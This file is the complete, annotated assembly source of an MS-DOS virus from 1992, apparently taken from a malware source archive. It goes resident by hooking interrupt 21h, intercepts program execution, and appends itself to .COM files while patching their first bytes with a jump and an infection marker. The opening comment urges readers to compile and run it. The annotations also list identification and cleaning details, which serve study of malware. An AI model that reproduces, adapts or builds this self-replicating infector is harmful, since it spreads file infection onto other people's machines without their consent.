MalwareSourceCode/MSDOS/Virus.MSDOS.Unknown.gadost.asm
2021-01-12 17:44:11 -06:00


;
; It is recommended to compile this, run it, and only then look through the
; source code. (You will have to dig through it anyway :-)).
;
; A cute (little) piece of nastiness, filth, junk, a beast...
;
; In short, a virus that infects files when someone tries to run them -
; for now those with the .COM "surname" (extension). It lives somewhere in
; the attic under the interrupt 21h vector, does not hide its fat body,
; recognizes infected files by a "shuriken" (a kind of little star, used by
; eastern peoples for cutting off the head and a few other things of one's
; neighbour) located in the 4th byte from the start, and checks for its own
; presence in memory like this: it puts the word BABA into AX (not the word
; as such, but word 0BABAh), executes interrupt 21h and looks whether this
; BABA is answered with 0FACCh. If it is, everything about the machine is clear.
;
; Copyright (c) 1992, Gogi&Givi International
;
; Build setup: tiny memory model, code origin 0100h (the offset at which a
; .COM image starts), plus two size constants derived from the
; StartVirus..endvir span.
.model tiny
.code
org 0100h
VirPar equ (endvir-StartVirus)/16+2 ; body size in 16-byte paragraphs (integer division) plus 2;
; subtracted from the memory block size when the code goes resident
VirLen equ (endvir-StartVirus) ; body size in bytes; used as the in-memory copy length and as the
; number of bytes written to the end of a target file
; gadost: carrier (first-generation) program at offset 0100h.
; Its first four bytes have the same shape as the 4-byte patch the body
; writes over the start of a target file (SuperByte, FileSize, marker 15):
; a near CALL opcode, its 16-bit displacement, and the marker byte.
; What follows is the tail of a small host: the operand of "mov ah,09h",
; "int 21h" and "ret" (the original comments call this the victim's normal
; code). The host's own first four bytes are kept at RobbedBytes.
; Identification value: marker byte 15 (0Fh) at offset 3 of the image.
gadost:
db 'è' ; single byte standing for the near CALL opcode (per the original comment)
dw StartVirus-$-2 ; displacement of that CALL, so execution enters StartVirus
db 15,09h ; marker byte 15 ("shuriken"), then the leftover operand of mov ah,09h
int 21h ; remainder of the host code ...
ret ; ... which ends with a near return
GoodMessage db '’®¢ à¨é ‹®§¨­áª¨©! ”€Š ž!',13,10,'$'
; '$'-terminated text followed by CR/LF; the original comment describes it
; as a nasty message for "uncle Lozinsky". Its offset is loaded by the
; "mov dx,offset GoodMessage" stored at RobbedBytes.
; StartVirus: entry of the body, reached through the CALL at offset 0100h.
;   1. Discards the return address of that CALL, then uses call/pop to
;      learn its own run-time address (SI = EntryPoint), so every later
;      access to its data is made relative to SI.
;   2. Copies the 4 saved host bytes from RobbedBytes back to cs:0100h.
;   3. Issues the residency query AX=0BABAh / int 21h; a reply of 0FACCh
;      in AX means a copy already answers int 21h.
; Stack when this block is left: saved ES on top, saved DS below it.
StartVirus:
pop si ; drop the return address pushed by the CALL at 0100h
call EntryPoint ; pushes the run-time address of EntryPoint
EntryPoint:
pop si ; SI = run-time address of EntryPoint
push ds ; preserve the host's DS and ES
push es
push si
mov ax,cs ; ES = DS = CS for the copy below
mov es,ax
mov ds,ax
mov di,0100h ; destination: start of the host image
add si,RobbedBytes-EntryPoint ; source: the 4 saved host bytes
mov cx,4
cld ; copy forwards
rep movsb ; host's first 4 bytes are restored in memory
pop si ; SI = EntryPoint again
mov ax,0BABAh ; residency query value
int 21h
cmp ax,0FACCh ; reply given by an installed Int21Server
jne NeedsBaba ; no reply: install the resident copy
jmp FucksNow ; already resident: go back to the host
; NeedsBaba: installs the resident copy (reached when the residency query
; was not answered with 0FACCh).
;   1. Takes the ES value saved at entry, steps one paragraph back and
;      treats that paragraph as the program's memory control block: the
;      word at +3 (block size in paragraphs) is reduced by VirPar, and the
;      word at +1 is used as the block's base segment.
;      NOTE(review): relies on ES = PSP segment at .COM entry - confirm.
;   2. Stores the current int 21h vector (0000:0084h) into Off21/Seg21 of
;      the running copy, so the values are part of what gets copied.
;   3. Copies VirLen bytes starting at StartVirus to offset 0 of the
;      segment that begins right after the shrunken block.
;   4. Points the int 21h vector at Int21Server inside that copy.
; What an analyst sees afterwards: the program's memory block is VirPar
; paragraphs smaller and int 21h resolves to the segment just past it.
NeedsBaba:
pop es ; ES = value saved at entry ...
push es ; ... put back for the exit path
mov ax,es
dec ax
mov es,ax ; ES = one paragraph lower (the block's MCB, see note above)
mov ax,es:[3] ; AX = block size in paragraphs
sub ax,virpar ; give up VirPar paragraphs at the end of the block
mov es:[3],ax
mov bx,es:[1] ; BX = word at MCB+1 (owner segment)
add bx,ax ; BX = owner segment + reduced size
mov es,bx ; ES = segment that receives the copy
push ds
xor ax,ax
mov ds,ax ; DS = 0000h: interrupt vector table
mov ax,ds:[21h*4] ; offset part of the current int 21h vector
mov cs:[si+Off21-EntryPoint],ax ; stored in Off21 (addressed relative to SI)
mov ax,ds:[21h*4+2] ; segment part of the vector
mov cs:[si+Seg21-EntryPoint],ax ; stored in Seg21
pop ds
xor di,di ; destination offset 0 in the new segment
push si
sub si,EntryPoint-StartVirus ; SI = run-time address of StartVirus
mov cx,VirLen
rep movsb ; copy the whole body DS:SI -> ES:DI
pop si
push ds
xor ax,ax
mov ds,ax ; DS = 0000h again
mov word ptr ds:[21h*4],Int21Server-StartVirus ; new vector offset: Int21Server inside the copy
mov ds:[21h*4+2],es ; new vector segment: the copy
pop ds
; FucksNow: common exit back to the host, used both when a resident copy
; already answered the query and after a fresh installation.
; Restores the ES and DS saved at entry, clears AX, BX and DI, and returns
; to cs:0100h, where the host's first 4 bytes were restored earlier.
FucksNow:
pop es ; ES saved at entry
pop ds ; DS saved at entry
mov si,0100h
push si ; return address = 0100h (host entry)
xor ax,ax ; hand over with AX, BX and DI cleared
xor bx,bx
xor di,di
ret ; near return: the host starts running
; Int21Server: replacement int 21h handler inside the resident copy.
;   AX = 0BABAh  residency query: every pushed register and FLAGS are
;                restored, AX is set to 0FACCh and the call ends with IRET.
;   AH = 4Bh     EXEC request: goes to Exec (infection attempt).
;   otherwise    goes to NotExec and is chained to the previous handler.
; FLAGS, AX, BX and DS pushed here are popped at Quit21Server.
Int21Server:
pushf
push ax
push bx
push ds
cmp ax,0BABAh ; residency query?
jne NotTest
pop ds ; undo the four pushes above
pop bx
pop ax
popf
mov ax,0FACCh ; reply expected by the loader code
iret
NotTest:
; The AH == 4Bh test is written indirectly (copy AX to CX, swap the
; halves, XOR with 4Bh) instead of a plain compare; the original comment
; says this is meant to hide the fact that EXEC is being handled.
; AL is not examined, so any AH=4Bh call matches.
push cx
mov cx,ax
xchg cl,ch ; CL = original AH
xor cl,4Bh ; ZF = 1 when AH was 4Bh
pop cx ; POP leaves the flags untouched
jz Exec
jmp NotExec
; Exec: file-name filter for an EXEC request.
; DS:DX is used as the address of the zero-terminated name of the file
; being started. The code scans to the terminating zero, steps back 11
; bytes and compares those 11 bytes with CommandName ('COMMAND.COM').
; On a full match the request is passed on untouched (Quit21Server);
; on the first mismatch control goes to NotCommand.
; The comparison is byte-for-byte, and this is the only check made on the
; name: no test of the extension is visible in this block.
Exec:
mov bx,dx ; BX = offset of the file name
SearchZero:
cmp byte ptr ds:[bx],0 ; end of the name?
je ZeroFound
inc bx
jmp SearchZero
ZeroFound:
sub bx,11 ; BX = 11 bytes before the terminating zero
push es ; ES is borrowed for the comparison
mov ax,cs
mov es,ax ; ES = resident segment
mov cx,11 ; length of 'COMMAND.COM'
mov di,offset CommandName-StartVirus ; offset of the reference name in the resident copy
Compare:
mov al,ds:[bx] ; byte of the requested name
cmp al,es:[di] ; against the reference byte
jne NotCommand
inc bx
inc di
dec cx
cmp cx,0
jne Compare
pop es ; all 11 bytes matched: restore ES
jmp Quit21Server ; COMMAND.COM is left alone
; NotCommand: infection attempt on the file named by DS:DX.
; AX, BX, CX and DX are pushed first and popped again at EndExec.
; Sequence of int 21h calls and checks:
;   3D02h  open the file read/write; leave on error
;   3Fh    read its first 4 bytes into RobbedBytes of the resident copy
;   --     leave if the first word equals 'ZM' (the original comment: why
;          infect an EXE?)
;   4202h  seek to the end; AX = low word of the resulting position
;   --     leave if AX < 1000 (signed test) or AX > 64000 (unsigned test)
;   --     FileSize = AX - 3
;   --     leave if the 4th byte read is 15 (marker already present)
;   40h    write VirLen bytes from offset 0 of the resident segment
;   4200h  seek back to offset 0
;   40h    write 4 bytes starting at SuperByte (SuperByte, FileSize, 15)
;   3Eh    close the file
; Resulting on-disk pattern, usable for identification and cleaning:
; byte 0 = CALL opcode, bytes 1-2 = original length - 3, byte 3 = 15, and
; the file is VirLen bytes longer; the original first four bytes are kept
; inside the appended body at the RobbedBytes position.
NotCommand:
pop es ; restore the ES pushed before the name comparison
push ax
push bx
push cx
push dx
mov ax,3D02h ; open, access mode 02h (read/write); DS:DX = file name
int 21h
jc EndExec ; open failed
mov bx,ax ; BX = file handle
mov cx,4 ; read 4 bytes
mov ax,cs
mov ds,ax ; DS = resident segment (buffer lives there)
mov ah,3Fh ; read from handle
mov dx,offset RobbedBytes-StartVirus ; buffer: RobbedBytes in the resident copy
int 21h
jc EndExec ; read failed
cmp word ptr cs:[RobbedBytes-StartVirus],'ZM' ; first word against the 'ZM' constant
je CloseFile ; treated as an EXE: skipped
xor cx,cx
xor dx,dx
mov ax,4202h ; seek, origin = end of file, distance 0
int 21h
cmp ax,1000 ; lower size limit
jl CloseFile ; signed test: values of 8000h and above are skipped here too
cmp ax,64000 ; upper size limit
ja CloseFile
sub ax,3
mov cs:[FileSize-StartVirus],ax ; displacement for the CALL written at the file start
cmp byte ptr cs:[RobbedBytes-StartVirus+3],15 ; marker byte at offset 3 of the file?
je CloseFile ; already marked: skipped
mov ax,cs
mov ds,ax
mov ah,40h ; write to handle at the current position (end of file)
xor dx,dx ; from offset 0 of the resident segment
mov cx,VirLen
int 21h
xor cx,cx
xor dx,dx
mov ax,4200h ; seek, origin = start of file, distance 0
int 21h
mov ah,40h ; write to handle
mov dx,offset SuperByte-StartVirus ; 4-byte patch: SuperByte, FileSize, marker
mov cx,4
int 21h
CloseFile:
mov ah,3Eh ; close handle BX
int 21h
EndExec:
pop dx ; restore the registers pushed at NotCommand
pop cx
pop bx
pop ax
jmp Quit21Server ; pass the EXEC request on
; NotExec / Quit21Server: common exit of the int 21h handler.
; Pops DS, BX, AX and FLAGS in reverse order of the pushes made at
; Int21Server, then chains to the previous handler through a far jump
; built from a raw opcode byte followed by the Off21/Seg21 words, which
; the installation code fills with the vector it found at 0000:0084h.
NotExec:
; empty label; the original comment reserves it for later additions
Quit21Server:
pop ds
pop bx
pop ax
popf ; caller's flags restored before chaining
db 0EAh ; far JMP opcode; the two words below are its operand
Off21 dw 0000h ; offset of the previous int 21h handler (0 until installed)
Seg21 dw 0000h ; segment of the previous int 21h handler
; Data at the end of the body.
; RobbedBytes: 4-byte save area for the first four bytes of the host. In
; this carrier it holds "mov dx,offset GoodMessage" plus the byte 0B4h,
; i.e. the start of the host code whose tail (09h / int 21h / ret) sits
; after the marker at the top of the file. The resident handler reuses
; the same 4 bytes as its read buffer for each file it examines.
; SuperByte / FileSize / 15: the 4-byte patch written to offset 0 of a
; target file (CALL opcode, displacement, marker).
RobbedBytes:
mov dx,offset GoodMessage ; first 3 saved host bytes
db 0B4h ; 4th saved host byte
SuperByte db 'è' ; single byte standing for the near CALL opcode
FileSize dw 0000h ; CALL displacement, set to file length - 3 before the patch is written
db 15 ; marker byte ("shuriken")
db '=>' ; decoration (per the original comment)
CommandName db 'COMMAND.COM<=' ; reference name; only its first 11 bytes are compared
endvir:
end gadost ; program entry point is gadost